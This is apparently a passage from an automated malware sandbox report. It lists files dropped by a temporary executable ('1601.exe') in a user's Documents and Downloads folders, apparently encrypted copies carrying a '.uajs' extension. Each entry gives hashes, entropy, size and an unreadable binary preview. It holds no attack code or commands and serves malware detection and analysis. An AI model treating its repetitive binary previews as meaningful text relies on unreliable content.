SHA-256:	15DBA676BB893CC6A703F7DAA170DFF396131463AB8C86AFC0D2606BF34E0462
SHA-512:	8BBCF6C63B7C7A00FD02AA97E03DFD7E3CA2946030F530DDB60CDA75303B1E13ADA02DDE02D2B80CD01FD613EE09CC0D34E04B1E78D5B5C677D0AC15AC39E45D
Malicious:	false
Preview:	TQDFJ.4bE....UW.. 2.8...8..\.9..7.......L{T.W.Q..ga.................b.j$Z.f......X.9.....Qz....1Y. t.v.=D..ST.bn.e%....>.'.lJ..F.b.M....q..I)..G`t..KP.....~-...WW}f.DW<.5.dR...vI@.!x.(....#...r...kp..h....S.....+...%./.8..g........Y..</...o.eO.`..F..y...A.c...9.X.;A.g...k..?.-...J .S.o...;.J..z.U..QE.{j_.o.......uW......9M..s..Z._S.9C[..EFs.un>].M.xE....-$.(.8R.a...<..4.7...[..3...GU...._~.E_.Fs.J..._..\....a..l.(...>II8..Q.=bb)eH..,...t@..7E..o.V.'.g...Xr.;...T...oU.B#rez:`..n%.$..l..N.mC... ...#..}.......d..eA.`m...7.b..2.....Y.T...S..k1.R......./..g (....l.w.gr3.._.l4M.....Qq.yc..`o..[........~Z..9B.J...n...6."......JN....G.I.0I..p..o...0..H1.....=k;.E.=....'0.....j4G...f...x...}..[F[...R..TO ........b.....q2..Cq......r2..kp.............o..lv..,........a.....n.^~_.4.-.....A.Ce.-k'..XiA.rM..]@j....}a=."...&[.8.;.K..K...u........<=..>..,c~.8>>u..X....3.o..4Tj<mg2..0D,..M.c.@}....lC..8zm,q.#..I;.....v..m^.........@.%......GRHo..h$b

C:\Users\user\Documents\ZGGKNSUKOP.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.882521515841171
Encrypted:	false
SSDEEP:	24:JH+9vlf7fvOUsmnZEi+tO7CBiCkSKScbuVdWIso+P/Zz4qph10c2w1bD:JH+9vlfZHZE/tO5SKS9Bso+P/Zz4q6Va
MD5:	58051A93CA0BD93A71913F602B331C93
SHA1:	9D0873AAF7B0E00F75D37BB2873D0DED53694268
SHA-256:	7445238E86A058CAE07246ED8AB1A4CB4E2AB530E097B152ED4FEA59CFC2F2FC
SHA-512:	0B044C982A0961702108D819DBD09ECB72663A2A32F8B803149AAD62C026E2173FEBD53FA5007BA89D089E6BE8E95BA97A38BD7601E026DBA9302960EB476A6C
Malicious:	false
Preview:	ZGGKNQ-Ko..)5...z....#k..l...99.qy.:)U$.r."j...@]./?T...m....q%yC.w.}.....b~T.....=...n..^\|6)..)i..V..]...pD.B.?r......~..)..4.......Jm..]...K....VA.C.+S.t9>.....uW.....a...V.e...%%........8.j?...L....4r...k.T.#IO.....5.@.% .Us......6...4.e$..x&..Q...7i5.Vw.T....=..5...+...~..^..2m..+.....E..!@....z....Hc...3.K...y....v....=.....V.....c..IXF+......gv....`2......!..._..N.....{J-..3n...W.._...1...N=....0..%m.....<.\..d.......,.[...S....T0.'q.5K.yR.~x..e.2y.!.X.....s...O.Zv......k...6K5....k{..y..q.(.qF^........u..<R..z9..g.f...T;..&......W..\.2dz}..S..C...>...[\|./.IO.<.a...\|........N..\|..=..}.=....<...+....O)......>;../T...^..?p.:U..P..}Ynv7...\....Mp..(.XX`e......../...2\..i>.q_.^...\|.......,s..O.bi...W..2.;...<d.S.....$.'@..Yu0v.X......@..4.<.7..a..8.f.*.w...N{P..B...1z.C.@..b..S[........P..o..efIk.r<...n2n.D..D.-...I:.oU>. .;...`:P.M......._..W...,......L..r......j'.z6.Wv.#...P.....t....P^.....s..p:..e...W.Er}$D.....

C:\Users\user\Documents\ZGGKNSUKOP.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.882521515841171
Encrypted:	false
SSDEEP:	24:JH+9vlf7fvOUsmnZEi+tO7CBiCkSKScbuVdWIso+P/Zz4qph10c2w1bD:JH+9vlfZHZE/tO5SKS9Bso+P/Zz4q6Va
MD5:	58051A93CA0BD93A71913F602B331C93
SHA1:	9D0873AAF7B0E00F75D37BB2873D0DED53694268
SHA-256:	7445238E86A058CAE07246ED8AB1A4CB4E2AB530E097B152ED4FEA59CFC2F2FC
SHA-512:	0B044C982A0961702108D819DBD09ECB72663A2A32F8B803149AAD62C026E2173FEBD53FA5007BA89D089E6BE8E95BA97A38BD7601E026DBA9302960EB476A6C
Malicious:	false
Preview:	ZGGKNQ-Ko..)5...z....#k..l...99.qy.:)U$.r."j...@]./?T...m....q%yC.w.}.....b~T.....=...n..^\|6)..)i..V..]...pD.B.?r......~..)..4.......Jm..]...K....VA.C.+S.t9>.....uW.....a...V.e...%%........8.j?...L....4r...k.T.#IO.....5.@.% .Us......6...4.e$..x&..Q...7i5.Vw.T....=..5...+...~..^..2m..+.....E..!@....z....Hc...3.K...y....v....=.....V.....c..IXF+......gv....`2......!..._..N.....{J-..3n...W.._...1...N=....0..%m.....<.\..d.......,.[...S....T0.'q.5K.yR.~x..e.2y.!.X.....s...O.Zv......k...6K5....k{..y..q.(.qF^........u..<R..z9..g.f...T;..&......W..\.2dz}..S..C...>...[\|./.IO.<.a...\|........N..\|..=..}.=....<...+....O)......>;../T...^..?p.:U..P..}Ynv7...\....Mp..(.XX`e......../...2\..i>.q_.^...\|.......,s..O.bi...W..2.;...<d.S.....$.'@..Yu0v.X......@..4.<.7..a..8.f.*.w...N{P..B...1z.C.@..b..S[........P..o..efIk.r<...n2n.D..D.-...I:.oU>. .;...`:P.M......._..W...,......L..r......j'.z6.Wv.#...P.....t....P^.....s..p:..e...W.Er}$D.....

C:\Users\user\Documents\ZIPXYXWIOY.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858733696524737
Encrypted:	false
SSDEEP:	24:JvVBJchdi8MMpApFb29b7onMOfd6A+SR2mVD1guk1a5LxfNtHrDAN5Zw1bD:J/pZXpFbEPoMOl6A+STD1gud5xfLvAbM
MD5:	9FBE2E728140215A7394A6430488ED16
SHA1:	7116D334DB2661CB27B9B6FFC409005495062D95
SHA-256:	CDC030662A34C637386D57A538F6FB62F4098B235512DE09535120F21ABEC294
SHA-512:	22A5E8CDD5C2325B6C0CFB9A90C4339F487C040092305D104FCF681287305F6C9370C42B66D40CA4E6FF601C014F8EC9C16B3F9F7DFE225270335033AA324249
Malicious:	false
Preview:	ZIPXY.?.z..~C$o......^.`..B.(.k...A......>..c].B._..x..L.k'..;.....L.H.^..}....!.%.GL.q..Z%,....g.7.Rze.Y.$./...rFV~(;@V[...\|....2i]%eS3......i..A....y.U../>.<..V..+.u].3...WV..^`...9....Jn/....R>U.....w.xJ.../...>.....5=1)Jv-..l..........F....O@....BU....,.".Y.Wb.T.s.....d.qe..D..FF.........v4....y...y..idL.'.....{..}......35......,./...+=."..-4.....U.%....Y..t.tO..... 1...fL....Z........s......7..Q-k_.h\...0.#.lM.&)]...)..Y5.f..#.D..?..M..y..G.V....L..N.p.w.`.....)u...".X....sJ.X.?u8:c..Z..#....".#....A...-e....G.....b..W...b...<...o.}nWDmf.Z)/...m^f]....].......,7Q..ShFF..?.L.-T.1?&'..;.....9..c.`...i.....+.,.&_fg...2.,.-..[...c.R\?.3.N.[...I...p.s.T.4}.1+KN..#..8........:.`.+..!k%..+g. .V...}.a..-.>..I.P.....m98ooI...Ug..@s._.i.5.....b(Px..#..'...3.7)6W...o.o._/<.(....c..1....M....LaZ=...O...P..8...H...\|1"J.g8a.s..v._........F}.H..).E@...;CJ~S.u..`.......=....r.>.!...<.C`50...Q~.....N.,.e3.G...Q:.`...D..3<....%{.....y......Jz...

C:\Users\user\Documents\ZIPXYXWIOY.mp3.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858733696524737
Encrypted:	false
SSDEEP:	24:JvVBJchdi8MMpApFb29b7onMOfd6A+SR2mVD1guk1a5LxfNtHrDAN5Zw1bD:J/pZXpFbEPoMOl6A+STD1gud5xfLvAbM
MD5:	9FBE2E728140215A7394A6430488ED16
SHA1:	7116D334DB2661CB27B9B6FFC409005495062D95
SHA-256:	CDC030662A34C637386D57A538F6FB62F4098B235512DE09535120F21ABEC294
SHA-512:	22A5E8CDD5C2325B6C0CFB9A90C4339F487C040092305D104FCF681287305F6C9370C42B66D40CA4E6FF601C014F8EC9C16B3F9F7DFE225270335033AA324249
Malicious:	false
Preview:	ZIPXY.?.z..~C$o......^.`..B.(.k...A......>..c].B._..x..L.k'..;.....L.H.^..}....!.%.GL.q..Z%,....g.7.Rze.Y.$./...rFV~(;@V[...\|....2i]%eS3......i..A....y.U../>.<..V..+.u].3...WV..^`...9....Jn/....R>U.....w.xJ.../...>.....5=1)Jv-..l..........F....O@....BU....,.".Y.Wb.T.s.....d.qe..D..FF.........v4....y...y..idL.'.....{..}......35......,./...+=."..-4.....U.%....Y..t.tO..... 1...fL....Z........s......7..Q-k_.h\...0.#.lM.&)]...)..Y5.f..#.D..?..M..y..G.V....L..N.p.w.`.....)u...".X....sJ.X.?u8:c..Z..#....".#....A...-e....G.....b..W...b...<...o.}nWDmf.Z)/...m^f]....].......,7Q..ShFF..?.L.-T.1?&'..;.....9..c.`...i.....+.,.&_fg...2.,.-..[...c.R\?.3.N.[...I...p.s.T.4}.1+KN..#..8........:.`.+..!k%..+g. .V...}.a..-.>..I.P.....m98ooI...Ug..@s._.i.5.....b(Px..#..'...3.7)6W...o.o._/<.(....c..1....M....LaZ=...O...P..8...H...\|1"J.g8a.s..v._........F}.H..).E@...;CJ~S.u..`.......=....r.>.!...<.C`50...Q~.....N.,.e3.G...Q:.`...D..3<....%{.....y......Jz...

C:\Users\user\Downloads\DUUDTUBZFW.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.824320515864205
Encrypted:	false
SSDEEP:	24:zG4uV+xg/8KEGvQud6Dk1oueqQCLmnlRiFAJjj5GB8cYfeK4bkWfCgOGVw1bD:S4c/4utiuerRlhf5YYf94bkWfPOCyD
MD5:	3507C9FF8DDEC7E46D8B2FACEB4C1CFE
SHA1:	A53690AE351F2B5864E48296E45E1879131A7CFA
SHA-256:	141BB5EC411361B27F50663301B03D5E4345321545453E9E98A12EC9C563454C
SHA-512:	0CB71E0CE3CC33A01D952E051E3E2172296687CBD2E2BBD2E86254010F5251A0639DB8F46961E2A142661C0DCD781145C2AB86203B1D34660F8D6961C3E0CAF9
Malicious:	false
Preview:	DUUDT.D)..O9Y...\|b.....R.K..6%I?.I...]Vto.5B.U.RH0_.c..x......t...r..P.....z......7../......<9....i....JZ..Es...P.....G...Im..+....-...g...G.nM.%...X....H.8...w.[..().c...n.+M.!..._....t......r..@..k0...i...5..M\.7@..E.q.... ../....R..@....4.O=I.5.....\......FGJ...SBJ6e.u...Q......X...G..!.....C....".(d...F7.Neo{..RhsE...M........nd.._.L..5;.....PD..f.......x..V....u...FV..M......c....8...g........^).......)O9.......b.....7.X.......N.X.9.<?[.......&W.m...x....~.B..Ue.."....n;..6@.,r.;.A.p.w.Vk\|...ua..`.B..._)...;...X...k.!...\%..X.<.Iw.tk. OoE,t@..[....sD...'....KYl.Y..M.....g.r.y../.."D6/.9.%.H,.gm`...."..;@.. ...H+!!..%.5.kAR.9..kt.TO....P.?..7..O.b.u.....W.Q.....(..,.p.%z...Yi5..2...a/.Il.O.FsU...L..,.N..r......S...&8^..MA.....\..WXT..D1.......'</..e...'.n.6.`i...A........:-.j...CW..._....-cL...1.....W.Z..&.Qw....5.f."<.&.d.4xE..4......\|?e.\|-...=."(.O...eX......\xc:."../B..:...J.q....&@......N..._...,.;!....4XC.I...."....2....a.

C:\Users\user\Downloads\DUUDTUBZFW.docx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.824320515864205
Encrypted:	false
SSDEEP:	24:zG4uV+xg/8KEGvQud6Dk1oueqQCLmnlRiFAJjj5GB8cYfeK4bkWfCgOGVw1bD:S4c/4utiuerRlhf5YYf94bkWfPOCyD
MD5:	3507C9FF8DDEC7E46D8B2FACEB4C1CFE
SHA1:	A53690AE351F2B5864E48296E45E1879131A7CFA
SHA-256:	141BB5EC411361B27F50663301B03D5E4345321545453E9E98A12EC9C563454C
SHA-512:	0CB71E0CE3CC33A01D952E051E3E2172296687CBD2E2BBD2E86254010F5251A0639DB8F46961E2A142661C0DCD781145C2AB86203B1D34660F8D6961C3E0CAF9
Malicious:	false
Preview:	DUUDT.D)..O9Y...\|b.....R.K..6%I?.I...]Vto.5B.U.RH0_.c..x......t...r..P.....z......7../......<9....i....JZ..Es...P.....G...Im..+....-...g...G.nM.%...X....H.8...w.[..().c...n.+M.!..._....t......r..@..k0...i...5..M\.7@..E.q.... ../....R..@....4.O=I.5.....\......FGJ...SBJ6e.u...Q......X...G..!.....C....".(d...F7.Neo{..RhsE...M........nd.._.L..5;.....PD..f.......x..V....u...FV..M......c....8...g........^).......)O9.......b.....7.X.......N.X.9.<?[.......&W.m...x....~.B..Ue.."....n;..6@.,r.;.A.p.w.Vk\|...ua..`.B..._)...;...X...k.!...\%..X.<.Iw.tk. OoE,t@..[....sD...'....KYl.Y..M.....g.r.y../.."D6/.9.%.H,.gm`...."..;@.. ...H+!!..%.5.kAR.9..kt.TO....P.?..7..O.b.u.....W.Q.....(..,.p.%z...Yi5..2...a/.Il.O.FsU...L..,.N..r......S...&8^..MA.....\..WXT..D1.......'</..e...'.n.6.`i...A........:-.j...CW..._....-cL...1.....W.Z..&.Qw....5.f."<.&.d.4xE..4......\|?e.\|-...=."(.O...eX......\xc:."../B..:...J.q....&@......N..._...,.;!....4XC.I...."....2....a.

C:\Users\user\Downloads\EIVQSAOTAQ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868008925705345
Encrypted:	false
SSDEEP:	24:RwlX7ucPyqWzRKta/6GYXp3taSmuR2b91K5czKrzUmEFj3+aEeexsEobFT14Z/Oe:yB7uNqW9KM/6GI3tbR2bvK5czKrzJ4ji
MD5:	4DA79A6F11A40605C89E6EE1F01CA345
SHA1:	C145D1A138F9DB7DC349EE08F4A1F01E6F1FA725
SHA-256:	42B0DA9B07513A96983EDE0F1DBF516DD0727CB0F61546374E4F462D1ED17EB9
SHA-512:	A397DF7B8C332219331271B45202A4395784D7772375D0AA4E9CDA05251B6B402535032EEA3C0C59D18E6A4AF29759CDE37A1DC3CF4E0DD521C53F2207938F93
Malicious:	false
Preview:	EIVQS...6W.3.Jt..`O.._i..,....=.........'...{...9...Y.>.0.u..l@.J;.o.g.o.M.?.h..T.%..r..U......@&S.LEg......]...Y.....9.@>....r....r.h.c...).Q..br.O..TAz2...G.$.....S..0.\c.....g]-.`t0. ........'..N..S...kZ.....X..m'...&.........^1..l..c..V...xE$./.... q.uK..K_D;Kz.R.k....x...[{..*.FQ.......0.......x...o.4@w...fB..\|.6.p....blW...X..@. s.....B.J...y../6%f..wNP.w.....Wz.. ...[.W.....2.\.....;......H^2........>........X..A.sW..Ap...7i.%$(.....$.!..h..z.Z.....#.......w.zp..Z.8.".q...xy......W.j..t./.u...Gs.$..&....].......I.g.0.....\|.m..p...U....{.\|.......]..B..... ..H..Q4q...1!...L.TE......V...._>.h.k..N..J....6q.%Q.^{.wH....g...K......m...2.?.-._...,..hu.=!.;...`...z.......&..1 ....C..>.:V..8\..{..s....)..S....Y4j6+cY.8..aT..7.}..fP..aL....w...Q...=..F..V..Nz..q..i..Q....2..G@......D....,I.S..V=..z....l.6+.@.xO#......WF..x..(.]...v.#.... .3.".e....3...<~.#K....."S.4.T...s.Q .N<@.......e@.;..W...Ljp.!......V#1H...@...d......I.X$.....).N.e

C:\Users\user\Downloads\EIVQSAOTAQ.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868008925705345
Encrypted:	false
SSDEEP:	24:RwlX7ucPyqWzRKta/6GYXp3taSmuR2b91K5czKrzUmEFj3+aEeexsEobFT14Z/Oe:yB7uNqW9KM/6GI3tbR2bvK5czKrzJ4ji
MD5:	4DA79A6F11A40605C89E6EE1F01CA345
SHA1:	C145D1A138F9DB7DC349EE08F4A1F01E6F1FA725
SHA-256:	42B0DA9B07513A96983EDE0F1DBF516DD0727CB0F61546374E4F462D1ED17EB9
SHA-512:	A397DF7B8C332219331271B45202A4395784D7772375D0AA4E9CDA05251B6B402535032EEA3C0C59D18E6A4AF29759CDE37A1DC3CF4E0DD521C53F2207938F93
Malicious:	false
Preview:	EIVQS...6W.3.Jt..`O.._i..,....=.........'...{...9...Y.>.0.u..l@.J;.o.g.o.M.?.h..T.%..r..U......@&S.LEg......]...Y.....9.@>....r....r.h.c...).Q..br.O..TAz2...G.$.....S..0.\c.....g]-.`t0. ........'..N..S...kZ.....X..m'...&.........^1..l..c..V...xE$./.... q.uK..K_D;Kz.R.k....x...[{..*.FQ.......0.......x...o.4@w...fB..\|.6.p....blW...X..@. s.....B.J...y../6%f..wNP.w.....Wz.. ...[.W.....2.\.....;......H^2........>........X..A.sW..Ap...7i.%$(.....$.!..h..z.Z.....#.......w.zp..Z.8.".q...xy......W.j..t./.u...Gs.$..&....].......I.g.0.....\|.m..p...U....{.\|.......]..B..... ..H..Q4q...1!...L.TE......V...._>.h.k..N..J....6q.%Q.^{.wH....g...K......m...2.?.-._...,..hu.=!.;...`...z.......&..1 ....C..>.:V..8\..{..s....)..S....Y4j6+cY.8..aT..7.}..fP..aL....w...Q...=..F..V..Nz..q..i..Q....2..G@......D....,I.S..V=..z....l.6+.@.xO#......WF..x..(.]...v.#.... .3.".e....3...<~.#K....."S.4.T...s.Q .N<@.......e@.;..W...Ljp.!......V#1H...@...d......I.X$.....).N.e

C:\Users\user\Downloads\EIVQSAOTAQ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823879414912165
Encrypted:	false
SSDEEP:	24:R0aySo8dHWWwLEsNO94PkY1f+y3ZEOZB1h309bUznxHztgSCGw1bD:6aySo8doLTNZPb1fL3iOL2AnxBWGyD
MD5:	F18281638DAF96ECB79F878CAEB9F020
SHA1:	095B8DA27EC3A655CF79AF5A641EAAE1C9F6DA52
SHA-256:	15025D82EEE099244367AB264893F36D9A1F1459C6C3B0B59A29092D2E6CF352
SHA-512:	F19D2184671BD99EFA65C22AE663518683DC935B2F2EC58BD015666B29C822B0D869CB67BEA3AE180394952316B78876F6B94B67FD5AD3890ED5A233E763F8F7
Malicious:	false
Preview:	EIVQS.?3...?..uy.N...[..b.F...v..A.....u.Ak-....K0".R/.%1R.l/E....Wn.Dl...>b......qs.....{8J2....H..D<[....TL.[AK....$..n..e~.\.ww...@h......&..B}uT...+..........C.%cn+.<..+..^.<2....8=@Z.....#....X}T~....1...M...Q6..X\.i.m^<.......'I.~rT.=......'z .9...%.R......\.../..8).Zq..G8wVS.bl.E-lQ..+....5"?.LA..Eb.(t6E.....9....~Z.Sqn+.g..U.Q.&....P.....S...{.B".JCva.....X.....4~.+.=.U.qQ.>..M-.:....~T]".z..g.[.....$X}..~K&..t._U.4.}...u_.z..[a.^.z.ys.p.......:..Z.....kX.>l.....V..%H.......}..^.7.T..7...t.....%..}}...'7&...+.Ii.0.}...n....:;....c.e:.....}U=.u.....WO.\|...t......r.7.-.m.f.w2q.?...C.I.X....J9.....o.)...o...L(uA.....r.bT..'.....v..JuV$......oXs..2.eg.}.Wz..G....G.}.A....8.D...B.U......G.H[)..3.V.....P.q.....N..t....0$`7....:.hSv.....~.F.U....b.Y..\|.U@.E2 ..l....ga8..#..(R..WM.{.^...7.Y{.B+HJ`.%.!XI..x..\.p..Q.k.".HL ..*..J..".s....ch.V....g7/}.}....G....0>..n.+.q.'.3.-a..`..!...2....x.d.......R\|..#.O..Eh.s..N...>.:.......?...F.7.

C:\Users\user\Downloads\EIVQSAOTAQ.xlsx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.823879414912165
Encrypted:	false
SSDEEP:	24:R0aySo8dHWWwLEsNO94PkY1f+y3ZEOZB1h309bUznxHztgSCGw1bD:6aySo8doLTNZPb1fL3iOL2AnxBWGyD
MD5:	F18281638DAF96ECB79F878CAEB9F020
SHA1:	095B8DA27EC3A655CF79AF5A641EAAE1C9F6DA52
SHA-256:	15025D82EEE099244367AB264893F36D9A1F1459C6C3B0B59A29092D2E6CF352
SHA-512:	F19D2184671BD99EFA65C22AE663518683DC935B2F2EC58BD015666B29C822B0D869CB67BEA3AE180394952316B78876F6B94B67FD5AD3890ED5A233E763F8F7
Malicious:	false
Preview:	EIVQS.?3...?..uy.N...[..b.F...v..A.....u.Ak-....K0".R/.%1R.l/E....Wn.Dl...>b......qs.....{8J2....H..D<[....TL.[AK....$..n..e~.\.ww...@h......&..B}uT...+..........C.%cn+.<..+..^.<2....8=@Z.....#....X}T~....1...M...Q6..X\.i.m^<.......'I.~rT.=......'z .9...%.R......\.../..8).Zq..G8wVS.bl.E-lQ..+....5"?.LA..Eb.(t6E.....9....~Z.Sqn+.g..U.Q.&....P.....S...{.B".JCva.....X.....4~.+.=.U.qQ.>..M-.:....~T]".z..g.[.....$X}..~K&..t._U.4.}...u_.z..[a.^.z.ys.p.......:..Z.....kX.>l.....V..%H.......}..^.7.T..7...t.....%..}}...'7&...+.Ii.0.}...n....:;....c.e:.....}U=.u.....WO.\|...t......r.7.-.m.f.w2q.?...C.I.X....J9.....o.)...o...L(uA.....r.bT..'.....v..JuV$......oXs..2.eg.}.Wz..G....G.}.A....8.D...B.U......G.H[)..3.V.....P.q.....N..t....0$`7....:.hSv.....~.F.U....b.Y..\|.U@.E2 ..l....ga8..#..(R..WM.{.^...7.Y{.B+HJ`.%.!XI..x..\.p..Q.k.".HL ..*..J..".s....ch.V....g7/}.}....G....0>..n.+.q.'.3.-a..`..!...2....x.d.......R\|..#.O..Eh.s..N...>.:.......?...F.7.

C:\Users\user\Downloads\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.835237657400585
Encrypted:	false
SSDEEP:	24:5Eyuz15OcBKYk5GCgkATlPO9WmvIwTsGCa37lP+Cs30a34Jsw1bD:5EyuzbUgchgfwTsw3hRG0aQsyD
MD5:	ABF725E5F6166C6CB7B3FE258A3ED621
SHA1:	DAE4CF491FD2C890F33CC107251C36E0A30D58E6
SHA-256:	FE5C0E15FDB7D662967E61BEF9E19F5AA4D55E310DCC11E196C4088358F07B3B
SHA-512:	F216E636BE6670406830615B42F887583E681E5CAF1F702600680924AE0CD69644A1FB84A4DF5C5EA76356AE5061FC204B32112DB65CEAEA0150246F1C969E8C
Malicious:	false
Preview:	EOWRV,......YH..ovm]4.-.y..#...#m...@`.C.h..!....&!.l<$.vb..x7...y.).A..a.+B.X......#.@j...m......c\|.7;.8...AC........0........o...........+@6..7$2....Tm.......2....=..)o...&l.}D.........@.DZQ...Z,.7lJ...]..D7N(^t...I...".....s..M.Q.0eY.W.....;.......C?.......$}Gm,0.L........D...U..>......2...j....1\LA...4.>..P..8^..n.XYG...K\|..)x...4.N@5.sG....?,..........}........D#.T.6........tLOO'...O.u..S..%5...I."}^bz....{M.....6..Nt...%B...r....~$....i....?..Y..wN..>.3z..j.,..d.D.m...8.0.~.#R.nS.=.....S.....R...-..:G.4.....s.@..Qj.L.Bh]i!"..$@.9t..}<U\;....TId....XC......7F.y2Q....k/.ZN....W..{U.........f.v...(.aFI......Bi....^..z....I#1Z4FA.3\|M.8..=....5j.%.,.....d..zW........f.\.L..W._.l].OWL..........&Wo.Kt...=...)..qx8.s.v.i..t..Vjj..M`..mu..@T.....R6@D.}.l}.Z.w.....I...fb...3....k....I..-...Z~.%./..........g..vs...6......yY.@.=...?/q.....0fh4#..).N.....\.O.._...~...}...ns.v.B.]A_`.]?.......0..b...>._..q....c......e...q..........4.

C:\Users\user\Downloads\EOWRVPQCCS.docx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.835237657400585
Encrypted:	false
SSDEEP:	24:5Eyuz15OcBKYk5GCgkATlPO9WmvIwTsGCa37lP+Cs30a34Jsw1bD:5EyuzbUgchgfwTsw3hRG0aQsyD
MD5:	ABF725E5F6166C6CB7B3FE258A3ED621
SHA1:	DAE4CF491FD2C890F33CC107251C36E0A30D58E6
SHA-256:	FE5C0E15FDB7D662967E61BEF9E19F5AA4D55E310DCC11E196C4088358F07B3B
SHA-512:	F216E636BE6670406830615B42F887583E681E5CAF1F702600680924AE0CD69644A1FB84A4DF5C5EA76356AE5061FC204B32112DB65CEAEA0150246F1C969E8C
Malicious:	false
Preview:	EOWRV,......YH..ovm]4.-.y..#...#m...@`.C.h..!....&!.l<$.vb..x7...y.).A..a.+B.X......#.@j...m......c\|.7;.8...AC........0........o...........+@6..7$2....Tm.......2....=..)o...&l.}D.........@.DZQ...Z,.7lJ...]..D7N(^t...I...".....s..M.Q.0eY.W.....;.......C?.......$}Gm,0.L........D...U..>......2...j....1\LA...4.>..P..8^..n.XYG...K\|..)x...4.N@5.sG....?,..........}........D#.T.6........tLOO'...O.u..S..%5...I."}^bz....{M.....6..Nt...%B...r....~$....i....?..Y..wN..>.3z..j.,..d.D.m...8.0.~.#R.nS.=.....S.....R...-..:G.4.....s.@..Qj.L.Bh]i!"..$@.9t..}<U\;....TId....XC......7F.y2Q....k/.ZN....W..{U.........f.v...(.aFI......Bi....^..z....I#1Z4FA.3\|M.8..=....5j.%.,.....d..zW........f.\.L..W._.l].OWL..........&Wo.Kt...=...)..qx8.s.v.i..t..Vjj..M`..mu..@T.....R6@D.}.l}.Z.w.....I...fb...3....k....I..-...Z~.%./..........g..vs...6......yY.@.=...?/q.....0fh4#..).N.....\.O.._...~...}...ns.v.B.]A_`.]?.......0..b...>._..q....c......e...q..........4.

C:\Users\user\Downloads\EOWRVPQCCS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852276853006898
Encrypted:	false
SSDEEP:	24:5y0c8BEDOJmSQuHtM8WvlzUeRPfPfHU4xaZBI3b8BDAW3PRVXHfOyn1WroCw1bD:568BJm9uHt1u9VfPPU6SIwBDACVXr1WQ
MD5:	0B4C8BBFE3F6F5E886806FE414339E4F
SHA1:	64A6D7A433420AEF0C5B21444B63DE8F42D3D51D
SHA-256:	414F96320A9F12F3FE34CEF90DFB9437849161F7AF0EF8183F0E3C9414C1834B
SHA-512:	3EC82248E50371D3741DE956ED51C5F4BE52F38350CD1415DB7CD0511C776F58F17BE4517C668C6467C7E53FC852FCA211AEE77375FA5A270F47D00B846D57ED
Malicious:	false
Preview:	EOWRV.2m%:~ q..d...6..C{..y.\|..,.c....i.L7....P...m..w..:A..D.....k.m8D..m...........K}.....u.y......F..lwn6..C.@..5.1D....TP.=..pD.s.M.....y(..\]..&X].....5R..7;...=-.....!a..7.".M.b....90...%`..6^yI....^^...?.).B.V8....sY...q...m.GO...X......uY...k..0...qt....c.....?.e......0....Y.V]..A')pE....1..j....k.s......iy{..".......#{......].iu.).G.`R&i\....i.L.k......=7c.:.)....5/"....,....../1...=...7...e-..>.}q.f..V.z..J......,...i....;y@.:'T..Y...g..C./r. .....=s..JD....:N.ea.:.cz..c..j.`oK..J$.]S.S...1...gX...... ...aY...2....r..>..LK.dj...h...$ ..CV.HNcW...;.d.7B..p..(Z.E...7(......Y.F."0.td.=.pve.....B_.(...[.6...MhT...Kq..!b9T/\|h. .....(.d.E.e..DZ...N..}_..dnj..j...."e.....P..7..].5..l...G....^.....Z...o.;.....Ji>.uz..'...:@....e>z.Z.<.mK..b..Rh.^.".....+)......5_..hs....\|f....Zf-.I....y....l.].\|.U..\|....$q..i.$.n.p..V..}8..x......0C...../z1~B.....J...@.....{.&...`}...>v.n...n.......)....d...H.y..0...'.-/..<x.....E.P...a........T&

C:\Users\user\Downloads\EOWRVPQCCS.xlsx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852276853006898
Encrypted:	false
SSDEEP:	24:5y0c8BEDOJmSQuHtM8WvlzUeRPfPfHU4xaZBI3b8BDAW3PRVXHfOyn1WroCw1bD:568BJm9uHt1u9VfPPU6SIwBDACVXr1WQ
MD5:	0B4C8BBFE3F6F5E886806FE414339E4F
SHA1:	64A6D7A433420AEF0C5B21444B63DE8F42D3D51D
SHA-256:	414F96320A9F12F3FE34CEF90DFB9437849161F7AF0EF8183F0E3C9414C1834B
SHA-512:	3EC82248E50371D3741DE956ED51C5F4BE52F38350CD1415DB7CD0511C776F58F17BE4517C668C6467C7E53FC852FCA211AEE77375FA5A270F47D00B846D57ED
Malicious:	false
